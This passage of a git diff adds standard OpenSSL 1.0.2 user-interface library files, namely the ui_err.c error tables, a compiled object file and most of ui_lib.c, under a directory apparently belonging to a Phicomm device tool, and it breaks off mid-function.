+ *    for use in the OpenSSL Toolkit. (http://www.OpenSSL.org/)"
+ *
+ * 4. The names "OpenSSL Toolkit" and "OpenSSL Project" must not be used to
+ *    endorse or promote products derived from this software without
+ *    prior written permission. For written permission, please contact
+ *    openssl-core@OpenSSL.org.
+ *
+ * 5. Products derived from this software may not be called "OpenSSL"
+ *    nor may "OpenSSL" appear in their names without prior written
+ *    permission of the OpenSSL Project.
+ *
+ * 6. Redistributions of any form whatsoever must retain the following
+ *    acknowledgment:
+ *    "This product includes software developed by the OpenSSL Project
+ *    for use in the OpenSSL Toolkit (http://www.OpenSSL.org/)"
+ *
+ * THIS SOFTWARE IS PROVIDED BY THE OpenSSL PROJECT ``AS IS'' AND ANY
+ * EXPRESSED OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE
+ * IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR
+ * PURPOSE ARE DISCLAIMED.  IN NO EVENT SHALL THE OpenSSL PROJECT OR
+ * ITS CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL,
+ * SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT
+ * NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES;
+ * LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION)
+ * HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT,
+ * STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE)
+ * ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED
+ * OF THE POSSIBILITY OF SUCH DAMAGE.
+ * ====================================================================
+ *
+ * This product includes cryptographic software written by Eric Young
+ * (eay@cryptsoft.com).  This product includes software written by Tim
+ * Hudson (tjh@cryptsoft.com).
+ *
+ */
+
+/*
+ * NOTE: this file was auto generated by the mkerr.pl script: any changes
+ * made to it will be overwritten when the script next updates this file,
+ * only reason strings will be preserved.
+ */
+
+#include <stdio.h>
+#include <openssl/err.h>
+#include <openssl/ui.h>
+
+/* BEGIN ERROR CODES */
+#ifndef OPENSSL_NO_ERR
+
+# define ERR_FUNC(func) ERR_PACK(ERR_LIB_UI,func,0)
+# define ERR_REASON(reason) ERR_PACK(ERR_LIB_UI,0,reason)
+
+static ERR_STRING_DATA UI_str_functs[] = {
+    {ERR_FUNC(UI_F_GENERAL_ALLOCATE_BOOLEAN), "GENERAL_ALLOCATE_BOOLEAN"},
+    {ERR_FUNC(UI_F_GENERAL_ALLOCATE_PROMPT), "GENERAL_ALLOCATE_PROMPT"},
+    {ERR_FUNC(UI_F_GENERAL_ALLOCATE_STRING), "GENERAL_ALLOCATE_STRING"},
+    {ERR_FUNC(UI_F_UI_CTRL), "UI_ctrl"},
+    {ERR_FUNC(UI_F_UI_DUP_ERROR_STRING), "UI_dup_error_string"},
+    {ERR_FUNC(UI_F_UI_DUP_INFO_STRING), "UI_dup_info_string"},
+    {ERR_FUNC(UI_F_UI_DUP_INPUT_BOOLEAN), "UI_dup_input_boolean"},
+    {ERR_FUNC(UI_F_UI_DUP_INPUT_STRING), "UI_dup_input_string"},
+    {ERR_FUNC(UI_F_UI_DUP_VERIFY_STRING), "UI_dup_verify_string"},
+    {ERR_FUNC(UI_F_UI_GET0_RESULT), "UI_get0_result"},
+    {ERR_FUNC(UI_F_UI_NEW_METHOD), "UI_new_method"},
+    {ERR_FUNC(UI_F_UI_SET_RESULT), "UI_set_result"},
+    {0, NULL}
+};
+
+static ERR_STRING_DATA UI_str_reasons[] = {
+    {ERR_REASON(UI_R_COMMON_OK_AND_CANCEL_CHARACTERS),
+     "common ok and cancel characters"},
+    {ERR_REASON(UI_R_INDEX_TOO_LARGE), "index too large"},
+    {ERR_REASON(UI_R_INDEX_TOO_SMALL), "index too small"},
+    {ERR_REASON(UI_R_NO_RESULT_BUFFER), "no result buffer"},
+    {ERR_REASON(UI_R_RESULT_TOO_LARGE), "result too large"},
+    {ERR_REASON(UI_R_RESULT_TOO_SMALL), "result too small"},
+    {ERR_REASON(UI_R_UNKNOWN_CONTROL_COMMAND), "unknown control command"},
+    {0, NULL}
+};
+
+#endif
+
+void ERR_load_UI_strings(void)
+{
+#ifndef OPENSSL_NO_ERR
+
+    if (ERR_func_error_string(UI_str_functs[0].error) == NULL) {
+        ERR_load_strings(0, UI_str_functs);
+        ERR_load_strings(0, UI_str_reasons);
+    }
+#endif
+}
diff --git a/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/ui/ui_err.o b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/ui/ui_err.o
new file mode 100644
index 0000000000000000000000000000000000000000..a4b7234bf568a6d0aadad09434a8dc77020c7f8d
GIT binary patch
literal 1360
zcmbtT%}T>S5T2N7{R69b5GqnnD%z#>2hoERN)<sw3I#6`(i&^AO-r(Y>Oo(jkK!W~
zd;uTBqvFkr&NRE}cC83Hu$h@}=bNA1%|qejaKtb`iU9}E_aq8%Hqy6qJu?T>Fa_^3
zOCL{gl+W*{R!il;<w0tXZLv%`yBqY}?EPkjWwzHs7-Gmx;2OnsbXo#T+a=7zMKT{M
zFz$+Av=c^hIzHaPh6rC2d&K=sXoeWPeGZE=hfYX6C_^elGwMzO(KLHg3}WP&F!mkn
z;qf1EI)Oo%M0ZZ<GnzT5S&rwi3KWV(tKPIPt<tgObFb!BedMG>8k%Ha8s^_NxLpQ@
zv7x?}7I)el*rm;FU}fJ2R%tdGj*FPv<PO7YO8eZd+z7ww2CU^ZTaL$Xfq72dX3n*B
z<=G8K6#s`xBA4z?Kf#>H8J&ahDOQzbbO@90N$wS-p=q7Jg8SpR{>tA#F6GSNQbpEZ
zS3$I8eW`a8Obu<Rj$%umgs2X^vVprtU-DCEt3tD?a)A!z)cG9|q|c@E&oPc(b56ud
z^(-1)5Woa#>QnM1KCCuTy7WPL4HeM;K{<3jVfx(><x$jMB1aJcN60K%!}u>Euo^{%
HhR**2h|y01

literal 0
HcmV?d00001

diff --git a/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/ui/ui_lib.c b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/ui/ui_lib.c
new file mode 100644
index 0000000..01fb910
--- /dev/null
+++ b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/ui/ui_lib.c
@@ -0,0 +1,880 @@
+/* crypto/ui/ui_lib.c -*- mode:C; c-file-style: "eay" -*- */
+/*
+ * Written by Richard Levitte (richard@levitte.org) for the OpenSSL project
+ * 2001.
+ */
+/* ====================================================================
+ * Copyright (c) 2001 The OpenSSL Project.  All rights reserved.
+ *
+ * Redistribution and use in source and binary forms, with or without
+ * modification, are permitted provided that the following conditions
+ * are met:
+ *
+ * 1. Redistributions of source code must retain the above copyright
+ *    notice, this list of conditions and the following disclaimer.
+ *
+ * 2. Redistributions in binary form must reproduce the above copyright
+ *    notice, this list of conditions and the following disclaimer in
+ *    the documentation and/or other materials provided with the
+ *    distribution.
+ *
+ * 3. All advertising materials mentioning features or use of this
+ *    software must display the following acknowledgment:
+ *    "This product includes software developed by the OpenSSL Project
+ *    for use in the OpenSSL Toolkit. (http://www.openssl.org/)"
+ *
+ * 4. The names "OpenSSL Toolkit" and "OpenSSL Project" must not be used to
+ *    endorse or promote products derived from this software without
+ *    prior written permission. For written permission, please contact
+ *    openssl-core@openssl.org.
+ *
+ * 5. Products derived from this software may not be called "OpenSSL"
+ *    nor may "OpenSSL" appear in their names without prior written
+ *    permission of the OpenSSL Project.
+ *
+ * 6. Redistributions of any form whatsoever must retain the following
+ *    acknowledgment:
+ *    "This product includes software developed by the OpenSSL Project
+ *    for use in the OpenSSL Toolkit (http://www.openssl.org/)"
+ *
+ * THIS SOFTWARE IS PROVIDED BY THE OpenSSL PROJECT ``AS IS'' AND ANY
+ * EXPRESSED OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE
+ * IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR
+ * PURPOSE ARE DISCLAIMED.  IN NO EVENT SHALL THE OpenSSL PROJECT OR
+ * ITS CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL,
+ * SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT
+ * NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES;
+ * LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION)
+ * HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT,
+ * STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE)
+ * ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED
+ * OF THE POSSIBILITY OF SUCH DAMAGE.
+ * ====================================================================
+ *
+ * This product includes cryptographic software written by Eric Young
+ * (eay@cryptsoft.com).  This product includes software written by Tim
+ * Hudson (tjh@cryptsoft.com).
+ *
+ */
+
+#include <string.h>
+#include "cryptlib.h"
+#include <openssl/e_os2.h>
+#include <openssl/buffer.h>
+#include <openssl/ui.h>
+#include <openssl/err.h>
+
+#define OPENSSL_NO_TTY 1
+
+#ifdef OPENSSL_NO_TTY
+#include "ui_dummy.c"
+#else
+
+
+#include "ui_locl.h"
+
+IMPLEMENT_STACK_OF(UI_STRING_ST)
+
+static const UI_METHOD *default_UI_meth = NULL;
+
+UI *UI_new(void)
+{
+    return (UI_new_method(NULL));
+}
+
+UI *UI_new_method(const UI_METHOD *method)
+{
+    UI *ret;
+
+    ret = (UI *)OPENSSL_malloc(sizeof(UI));
+    if (ret == NULL) {
+        UIerr(UI_F_UI_NEW_METHOD, ERR_R_MALLOC_FAILURE);
+        return NULL;
+    }
+    if (method == NULL)
+        ret->meth = UI_get_default_method();
+    else
+        ret->meth = method;
+
+    ret->strings = NULL;
+    ret->user_data = NULL;
+    ret->flags = 0;
+    CRYPTO_new_ex_data(CRYPTO_EX_INDEX_UI, ret, &ret->ex_data);
+    return ret;
+}
+
+static void free_string(UI_STRING *uis)
+{
+    if (uis->flags & OUT_STRING_FREEABLE) {
+        OPENSSL_free((char *)uis->out_string);
+        switch (uis->type) {
+        case UIT_BOOLEAN:
+            OPENSSL_free((char *)uis->_.boolean_data.action_desc);
+            OPENSSL_free((char *)uis->_.boolean_data.ok_chars);
+            OPENSSL_free((char *)uis->_.boolean_data.cancel_chars);
+            break;
+        default:
+            break;
+        }
+    }
+    OPENSSL_free(uis);
+}
+
+void UI_free(UI *ui)
+{
+    if (ui == NULL)
+        return;
+    sk_UI_STRING_pop_free(ui->strings, free_string);
+    CRYPTO_free_ex_data(CRYPTO_EX_INDEX_UI, ui, &ui->ex_data);
+    OPENSSL_free(ui);
+}
+
+static int allocate_string_stack(UI *ui)
+{
+    if (ui->strings == NULL) {
+        ui->strings = sk_UI_STRING_new_null();
+        if (ui->strings == NULL) {
+            return -1;
+        }
+    }
+    return 0;
+}
+
+static UI_STRING *general_allocate_prompt(UI *ui, const char *prompt,
+                                          int prompt_freeable,
+                                          enum UI_string_types type,
+                                          int input_flags, char *result_buf)
+{
+    UI_STRING *ret = NULL;
+
+    if (prompt == NULL) {
+        UIerr(UI_F_GENERAL_ALLOCATE_PROMPT, ERR_R_PASSED_NULL_PARAMETER);
+    } else if ((type == UIT_PROMPT || type == UIT_VERIFY
+                || type == UIT_BOOLEAN) && result_buf == NULL) {
+        UIerr(UI_F_GENERAL_ALLOCATE_PROMPT, UI_R_NO_RESULT_BUFFER);
+    } else if ((ret = (UI_STRING *)OPENSSL_malloc(sizeof(UI_STRING)))) {
+        ret->out_string = prompt;
+        ret->flags = prompt_freeable ? OUT_STRING_FREEABLE : 0;
+        ret->input_flags = input_flags;
+        ret->type = type;
+        ret->result_buf = result_buf;
+    }
+    return ret;
+}
+
+static int general_allocate_string(UI *ui, const char *prompt,
+                                   int prompt_freeable,
+                                   enum UI_string_types type, int input_flags,
+                                   char *result_buf, int minsize, int maxsize,
+                                   const char *test_buf)
+{
+    int ret = -1;
+    UI_STRING *s = general_allocate_prompt(ui, prompt, prompt_freeable,
+                                           type, input_flags, result_buf);
+
+    if (s) {
+        if (allocate_string_stack(ui) >= 0) {
+            s->_.string_data.result_minsize = minsize;
+            s->_.string_data.result_maxsize = maxsize;
+            s->_.string_data.test_buf = test_buf;
+            ret = sk_UI_STRING_push(ui->strings, s);
+            /* sk_push() returns 0 on error.  Let's addapt that */
+            if (ret <= 0)
+                ret--;
+        } else
+            free_string(s);
+    }
+    return ret;
+}
+
+static int general_allocate_boolean(UI *ui,
+                                    const char *prompt,
+                                    const char *action_desc,
+                                    const char *ok_chars,
+                                    const char *cancel_chars,
+                                    int prompt_freeable,
+                                    enum UI_string_types type,
+                                    int input_flags, char *result_buf)
+{
+    int ret = -1;
+    UI_STRING *s;
+    const char *p;
+
+    if (ok_chars == NULL) {
+        UIerr(UI_F_GENERAL_ALLOCATE_BOOLEAN, ERR_R_PASSED_NULL_PARAMETER);
+    } else if (cancel_chars == NULL) {
+        UIerr(UI_F_GENERAL_ALLOCATE_BOOLEAN, ERR_R_PASSED_NULL_PARAMETER);
+    } else {
+        for (p = ok_chars; *p; p++) {
+            if (strchr(cancel_chars, *p)) {
+                UIerr(UI_F_GENERAL_ALLOCATE_BOOLEAN,
+                      UI_R_COMMON_OK_AND_CANCEL_CHARACTERS);
+            }
+        }
+
+        s = general_allocate_prompt(ui, prompt, prompt_freeable,
+                                    type, input_flags, result_buf);
+
+        if (s) {
+            if (allocate_string_stack(ui) >= 0) {
+                s->_.boolean_data.action_desc = action_desc;
+                s->_.boolean_data.ok_chars = ok_chars;
+                s->_.boolean_data.cancel_chars = cancel_chars;
+                ret = sk_UI_STRING_push(ui->strings, s);
+                /*
+                 * sk_push() returns 0 on error. Let's addapt that
+                 */
+                if (ret <= 0)
+                    ret--;
+            } else
+                free_string(s);
+        }
+    }
+    return ret;
+}
+
+/*
+ * Returns the index to the place in the stack or -1 for error.  Uses a
+ * direct reference to the prompt.
+ */
+int UI_add_input_string(UI *ui, const char *prompt, int flags,
+                        char *result_buf, int minsize, int maxsize)
+{
+    return general_allocate_string(ui, prompt, 0,
+                                   UIT_PROMPT, flags, result_buf, minsize,
+                                   maxsize, NULL);
+}
+
+/* Same as UI_add_input_string(), excepts it takes a copy of the prompt */
+int UI_dup_input_string(UI *ui, const char *prompt, int flags,
+                        char *result_buf, int minsize, int maxsize)
+{
+    char *prompt_copy = NULL;
+
+    if (prompt) {
+        prompt_copy = BUF_strdup(prompt);
+        if (prompt_copy == NULL) {
+            UIerr(UI_F_UI_DUP_INPUT_STRING, ERR_R_MALLOC_FAILURE);
+            return 0;
+        }
+    }
+
+    return general_allocate_string(ui, prompt_copy, 1,
+                                   UIT_PROMPT, flags, result_buf, minsize,
+                                   maxsize, NULL);
+}
+
+int UI_add_verify_string(UI *ui, const char *prompt, int flags,
+                         char *result_buf, int minsize, int maxsize,
+                         const char *test_buf)
+{
+    return general_allocate_string(ui, prompt, 0,
+                                   UIT_VERIFY, flags, result_buf, minsize,
+                                   maxsize, test_buf);
+}
+
+int UI_dup_verify_string(UI *ui, const char *prompt, int flags,
+                         char *result_buf, int minsize, int maxsize,
+                         const char *test_buf)
+{
+    char *prompt_copy = NULL;
+
+    if (prompt) {
+        prompt_copy = BUF_strdup(prompt);
+        if (prompt_copy == NULL) {
+            UIerr(UI_F_UI_DUP_VERIFY_STRING, ERR_R_MALLOC_FAILURE);
+            return -1;
+        }
+    }
+
+    return general_allocate_string(ui, prompt_copy, 1,
+                                   UIT_VERIFY, flags, result_buf, minsize,
+                                   maxsize, test_buf);
+}
+
+int UI_add_input_boolean(UI *ui, const char *prompt, const char *action_desc,
+                         const char *ok_chars, const char *cancel_chars,
+                         int flags, char *result_buf)
+{
+    return general_allocate_boolean(ui, prompt, action_desc,
+                                    ok_chars, cancel_chars, 0, UIT_BOOLEAN,
+                                    flags, result_buf);
+}
+
+int UI_dup_input_boolean(UI *ui, const char *prompt, const char *action_desc,
+                         const char *ok_chars, const char *cancel_chars,
+                         int flags, char *result_buf)
+{
+    char *prompt_copy = NULL;
+    char *action_desc_copy = NULL;
+    char *ok_chars_copy = NULL;
+    char *cancel_chars_copy = NULL;
+
+    if (prompt) {
+        prompt_copy = BUF_strdup(prompt);
+        if (prompt_copy == NULL) {
+            UIerr(UI_F_UI_DUP_INPUT_BOOLEAN, ERR_R_MALLOC_FAILURE);
+            goto err;
+        }
+    }
+
+    if (action_desc) {
+        action_desc_copy = BUF_strdup(action_desc);
+        if (action_desc_copy == NULL) {
+            UIerr(UI_F_UI_DUP_INPUT_BOOLEAN, ERR_R_MALLOC_FAILURE);
+            goto err;
+        }
+    }
+
+    if (ok_chars) {
+        ok_chars_copy = BUF_strdup(ok_chars);
+        if (ok_chars_copy == NULL) {
+            UIerr(UI_F_UI_DUP_INPUT_BOOLEAN, ERR_R_MALLOC_FAILURE);
+            goto err;
+        }
+    }
+
+    if (cancel_chars) {
+        cancel_chars_copy = BUF_strdup(cancel_chars);
+        if (cancel_chars_copy == NULL) {
+            UIerr(UI_F_UI_DUP_INPUT_BOOLEAN, ERR_R_MALLOC_FAILURE);
+            goto err;
+        }
+    }
+
+    return general_allocate_boolean(ui, prompt_copy, action_desc_copy,
+                                    ok_chars_copy, cancel_chars_copy, 1,
+                                    UIT_BOOLEAN, flags, result_buf);
+ err:
+    if (prompt_copy)
+        OPENSSL_free(prompt_copy);
+    if (action_desc_copy)
+        OPENSSL_free(action_desc_copy);
+    if (ok_chars_copy)
+        OPENSSL_free(ok_chars_copy);
+    if (cancel_chars_copy)
+        OPENSSL_free(cancel_chars_copy);
+    return -1;
+}
+
+int UI_add_info_string(UI *ui, const char *text)
+{
+    return general_allocate_string(ui, text, 0, UIT_INFO, 0, NULL, 0, 0,
+                                   NULL);
+}
+
+int UI_dup_info_string(UI *ui, const char *text)
+{
+    char *text_copy = NULL;
+
+    if (text) {
+        text_copy = BUF_strdup(text);
+        if (text_copy == NULL) {
+            UIerr(UI_F_UI_DUP_INFO_STRING, ERR_R_MALLOC_FAILURE);
+            return -1;
+        }
+    }
+
+    return general_allocate_string(ui, text_copy, 1, UIT_INFO, 0, NULL,
+                                   0, 0, NULL);
+}
+
+int UI_add_error_string(UI *ui, const char *text)
+{
+    return general_allocate_string(ui, text, 0, UIT_ERROR, 0, NULL, 0, 0,
+                                   NULL);
+}
+
+int UI_dup_error_string(UI *ui, const char *text)
+{
+    char *text_copy = NULL;
+
+    if (text) {
+        text_copy = BUF_strdup(text);
+        if (text_copy == NULL) {
+            UIerr(UI_F_UI_DUP_ERROR_STRING, ERR_R_MALLOC_FAILURE);
+            return -1;
+        }
+    }
+    return general_allocate_string(ui, text_copy, 1, UIT_ERROR, 0, NULL,
+                                   0, 0, NULL);
+}
+
+char *UI_construct_prompt(UI *ui, const char *object_desc,
+                          const char *object_name)
+{
+    char *prompt = NULL;
+
+    if (ui->meth->ui_construct_prompt)
+        prompt = ui->meth->ui_construct_prompt(ui, object_desc, object_name);
+    else {
+        char prompt1[] = "Enter ";
+        char prompt2[] = " for ";
+        char prompt3[] = ":";
+        int len = 0;
+
+        if (object_desc == NULL)
+            return NULL;
+        len = sizeof(prompt1) - 1 + strlen(object_desc);
+        if (object_name)
+            len += sizeof(prompt2) - 1 + strlen(object_name);
+        len += sizeof(prompt3) - 1;
+
+        prompt = (char *)OPENSSL_malloc(len + 1);
+        BUF_strlcpy(prompt, prompt1, len + 1);
+        BUF_strlcat(prompt, object_desc, len + 1);
+        if (object_name) {
+            BUF_strlcat(prompt, prompt2, len + 1);
+            BUF_strlcat(prompt, object_name, len + 1);
+        }
+        BUF_strlcat(prompt, prompt3, len + 1);
+    }
+    return prompt;
+}
+
+void *UI_add_user_data(UI *ui, void *user_data)
+{
+    void *old_data = ui->user_data;
+    ui->user_data = user_data;
+    return old_data;
+}
+
+void *UI_get0_user_data(UI *ui)
+{
+    return ui->user_data;
+}
+
+const char *UI_get0_result(UI *ui, int i)
+{
+    if (i < 0) {
+        UIerr(UI_F_UI_GET0_RESULT, UI_R_INDEX_TOO_SMALL);
+        return NULL;
+    }
+    if (i >= sk_UI_STRING_num(ui->strings)) {
+        UIerr(UI_F_UI_GET0_RESULT, UI_R_INDEX_TOO_LARGE);
+        return NULL;
+    }
+    return UI_get0_result_string(sk_UI_STRING_value(ui->strings, i));
+}
+
+static int print_error(const char *str, size_t len, UI *ui)
+{
+    UI_STRING uis;
+
+    memset(&uis, 0, sizeof(uis));
+    uis.type = UIT_ERROR;
+    uis.out_string = str;
+
+    if (ui->meth->ui_write_string && !ui->meth->ui_write_string(ui, &uis))
+        return -1;
+    return 0;
+}
+
+int UI_process(UI *ui)
+{
+    int i, ok = 0;
+
+    if (ui->meth->ui_open_session && !ui->meth->ui_open_session(ui))
+        return -1;
+
+    if (ui->flags & UI_FLAG_PRINT_ERRORS)
+        ERR_print_errors_cb((int (*)(const char *, size_t, void *))
+                            print_error, (void *)ui);
+
+    for (i = 0; i < sk_UI_STRING_num(ui->strings); i++) {
+        if (ui->meth->ui_write_string
+            && !ui->meth->ui_write_string(ui,
+                                          sk_UI_STRING_value(ui->strings, i)))
+        {
+            ok = -1;
+            goto err;
+        }
+    }
+
+    if (ui->meth->ui_flush)
+        switch (ui->meth->ui_flush(ui)) {
+        case -1:               /* Interrupt/Cancel/something... */
+            ok = -2;
+            goto err;
+        case 0:                /* Errors */
+            ok = -1;
+            goto err;
+        default:               /* Success */
+            ok = 0;
+            break;
+        }
+
+    for (i = 0; i < sk_UI_STRING_num(ui->strings); i++) {
+        if (ui->meth->ui_read_string) {
+            switch (ui->meth->ui_read_string(ui,
+                                             sk_UI_STRING_value(ui->strings,
+                                                                i))) {
+            case -1:           /* Interrupt/Cancel/something... */
+                ok = -2;
+                goto err;
+            case 0:            /* Errors */
+                ok = -1;
+                goto err;
+            default:           /* Success */
+                ok = 0;
+                break;
+            }
+        }
+    }
+ err:
+    if (ui->meth->ui_close_session && !ui->meth->ui_close_session(ui))
+        return -1;
+    return ok;
+}
+
+int UI_ctrl(UI *ui, int cmd, long i, void *p, void (*f) (void))
+{
+    if (ui == NULL) {
+        UIerr(UI_F_UI_CTRL, ERR_R_PASSED_NULL_PARAMETER);
+        return -1;
+    }
+    switch (cmd) {
+    case UI_CTRL_PRINT_ERRORS:
+        {
+            int save_flag = ! !(ui->flags & UI_FLAG_PRINT_ERRORS);
+            if (i)
+                ui->flags |= UI_FLAG_PRINT_ERRORS;
+            else
+                ui->flags &= ~UI_FLAG_PRINT_ERRORS;
+            return save_flag;
+        }
+    case UI_CTRL_IS_REDOABLE:
+        return ! !(ui->flags & UI_FLAG_REDOABLE);
+    default:
+        break;
+    }
+    UIerr(UI_F_UI_CTRL, UI_R_UNKNOWN_CONTROL_COMMAND);
+    return -1;
+}
+
+int UI_get_ex_new_index(long argl, void *argp, CRYPTO_EX_new *new_func,
+                        CRYPTO_EX_dup *dup_func, CRYPTO_EX_free *free_func)
+{
+    return CRYPTO_get_ex_new_index(CRYPTO_EX_INDEX_UI, argl, argp,
+                                   new_func, dup_func, free_func);
+}
+
+int UI_set_ex_data(UI *r, int idx, void *arg)
+{
+    return (CRYPTO_set_ex_data(&r->ex_data, idx, arg));
+}
+
+void *UI_get_ex_data(UI *r, int idx)
+{
+    return (CRYPTO_get_ex_data(&r->ex_data, idx));
+}
+
+void UI_set_default_method(const UI_METHOD *meth)
+{
+    default_UI_meth = meth;
+}
+
+const UI_METHOD *UI_get_default_method(void)
+{
+    if (default_UI_meth == NULL) {
+        default_UI_meth = UI_OpenSSL();
+    }
+    return default_UI_meth;
+}
+
+const UI_METHOD *UI_get_method(UI *ui)
+{
+    return ui->meth;
+}
+
+const UI_METHOD *UI_set_method(UI *ui, const UI_METHOD *meth)
+{
+    ui->meth = meth;
+    return ui->meth;
+}
+
+UI_METHOD *UI_create_method(char *name)
+{
+    UI_METHOD *ui_method = (UI_METHOD *)OPENSSL_malloc(sizeof(UI_METHOD));
+
+    if (ui_method) {
+        memset(ui_method, 0, sizeof(*ui_method));
+        ui_method->name = BUF_strdup(name);
+    }
+    return ui_method;
+}
+
+/*
+ * BIG FSCKING WARNING!!!! If you use this on a statically allocated method
+ * (that is, it hasn't been allocated using UI_create_method(), you deserve
+ * anything Murphy can throw at you and more! You have been warned.
+ */
+void UI_destroy_method(UI_METHOD *ui_method)
+{
+    OPENSSL_free(ui_method->name);
+    ui_method->name = NULL;
+    OPENSSL_free(ui_method);
+}
+
+int UI_method_set_opener(UI_METHOD *method, int (*opener) (UI *ui))
+{
+    if (method) {
+        method->ui_open_session = opener;
+        return 0;
+    } else
+        return -1;
+}
+
+int UI_method_set_writer(UI_METHOD *method,
+                         int (*writer) (UI *ui, UI_STRING *uis))
+{
+    if (method) {
+        method->ui_write_string = writer;
+        return 0;
+    } else
+        return -1;
+}
+
+int UI_method_set_flusher(UI_METHOD *method, int (*flusher) (UI *ui))
+{
+    if (method) {
+        method->ui_flush = flusher;
+        return 0;
+    } else
+        return -1;
+}
+
+int UI_method_set_reader(UI_METHOD *method,
+                         int (*reader) (UI *ui, UI_STRING *uis))
+{
+    if (method) {
+        method->ui_read_string = reader;
+        return 0;
+    } else
+        return -1;
+}
+
+int UI_method_set_closer(UI_METHOD *method, int (*closer) (UI *ui))
+{
+    if (method) {
+        method->ui_close_session = closer;
+        return 0;
+    } else
+        return -1;
+}
+
+int UI_method_set_prompt_constructor(UI_METHOD *method,
+                                     char *(*prompt_constructor) (UI *ui,
+                                                                  const char
+                                                                  *object_desc,
+                                                                  const char
+                                                                  *object_name))
+{
+    if (method) {
+        method->ui_construct_prompt = prompt_constructor;
+        return 0;
+    } else
+        return -1;
+}
+
+int (*UI_method_get_opener(UI_METHOD *method)) (UI *) {
+    if (method)
+        return method->ui_open_session;
+    else
+        return NULL;
+}
+
+int (*UI_method_get_writer(UI_METHOD *method)) (UI *, UI_STRING *) {
+    if (method)
+        return method->ui_write_string;
+    else
+        return NULL;
+}
+
+int (*UI_method_get_flusher(UI_METHOD *method)) (UI *) {
+    if (method)
+        return method->ui_flush;
+    else
+        return NULL;
+}
+
+int (*UI_method_get_reader(UI_METHOD *method)) (UI *, UI_STRING *) {
+    if (method)
+        return method->ui_read_string;
+    else
+        return NULL;
+}
+
+int (*UI_method_get_closer(UI_METHOD *method)) (UI *) {
+    if (method)
+        return method->ui_close_session;
+    else
+        return NULL;
+}
+
+char *(*UI_method_get_prompt_constructor(UI_METHOD *method)) (UI *,
+                                                              const char *,
+                                                              const char *) {
+    if (method)
+        return method->ui_construct_prompt;
+    else
+        return NULL;
+}
+
+enum UI_string_types UI_get_string_type(UI_STRING *uis)
+{
+    if (!uis)
+        return UIT_NONE;
+    return uis->type;
+}
+
+int UI_get_input_flags(UI_STRING *uis)
+{
+    if (!uis)
+        return 0;
+    return uis->input_flags;
+}
+
+const char *UI_get0_output_string(UI_STRING *uis)
+{
+    if (!uis)
+        return NULL;
+    return uis->out_string;
+}
+
+const char *UI_get0_action_string(UI_STRING *uis)
+{
+    if (!uis)
+        return NULL;
+    switch (uis->type) {
+    case UIT_PROMPT:
+    case UIT_BOOLEAN:
+        return uis->_.boolean_data.action_desc;
+    default:
+        return NULL;
+    }
+}
+
+const char *UI_get0_result_string(UI_STRING *uis)
+{
+    if (!uis)
+        return NULL;
+    switch (uis->type) {
+    case UIT_PROMPT:
+    case UIT_VERIFY:
+        return uis->result_buf;
+    default:
+        return NULL;
+    }
+}
+
+const char *UI_get0_test_string(UI_STRING *uis)
+{
+    if (!uis)
+        return NULL;
+    switch (uis->type) {
+    case UIT_VERIFY:
+        return uis->_.string_data.test_buf;
+    default:
+        return NULL;
+    }
+}
+
+int UI_get_result_minsize(UI_STRING *uis)
+{
+    if (!uis)
+        return -1;
+    switch (uis->type) {
+    case UIT_PROMPT:
+    case UIT_VERIFY:
+        return uis->_.string_data.result_minsize;
+    default:
+        return -1;
+    }
+}
+
+int UI_get_result_maxsize(UI_STRING *uis)
+{
+    if (!uis)
+        return -1;
+    switch (uis->type) {
+    case UIT_PROMPT:
+    case UIT_VERIFY:
+        return uis->_.string_data.result_maxsize;
+    default:
+        return -1;
+    }
+}
+
+int UI_set_result(UI *ui, UI_STRING *uis, const char *result)
+{
+    int l = strlen(result);
+
+    ui->flags &= ~UI_FLAG_REDOABLE;
+
+    if (!uis)
+        return -1;
+    switch (uis->type) {
+    case UIT_PROMPT:
+    case UIT_VERIFY:
+        {
+            char number1[DECIMAL_SIZE(uis->_.string_data.result_minsize) + 1];
+            char number2[DECIMAL_SIZE(uis->_.string_data.result_maxsize) + 1];
+
+            BIO_snprintf(number1, sizeof(number1), "%d",
+                         uis->_.string_data.result_minsize);
+            BIO_snprintf(number2, sizeof(number2), "%d",
+                         uis->_.string_data.result_maxsize);
+
+            if (l < uis->_.string_data.result_minsize) {
+                ui->flags |= UI_FLAG_REDOABLE;
+                UIerr(UI_F_UI_SET_RESULT, UI_R_RESULT_TOO_SMALL);
+                ERR_add_error_data(5, "You must type in ",
+                                   number1, " to ", number2, " characters");
+                return -1;
+            }
+            if (l > uis->_.string_data.result_maxsize) {
+                ui->flags |= UI_FLAG_REDOABLE;
+                UIerr(UI_F_UI_SET_RESULT, UI_R_RESULT_TOO_LARGE);
+                ERR_add_error_data(5, "You must type in ",
+                                   number1, " to ", number2, " characters");
+                return -1;
+            }
+        }
+
+        if (!uis->result_buf) {
